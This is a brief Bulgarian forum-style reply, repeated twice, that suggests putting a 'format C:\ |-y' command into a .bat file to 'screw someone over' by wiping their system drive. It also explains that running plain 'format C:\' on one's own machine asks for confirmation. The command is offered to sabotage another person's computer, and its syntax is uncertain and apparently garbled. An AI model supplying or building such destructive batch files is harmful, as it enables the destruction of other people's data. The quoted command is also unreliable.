Ами format C:\ |-y мисля,че беше, тоест ако искаш да правиш някакъв "хак" в смисъл да прецакаш някого с .бат - то това ти трябва, а ако е за теб просто format C:\ и си потвърждаваш сам !
Ами format C:\ |-y мисля,че беше, тоест ако искаш да правиш някакъв "хак" в смисъл да прецакаш някого с .бат - то това ти трябва, а ако е за теб просто format C:\ и си потвърждаваш сам !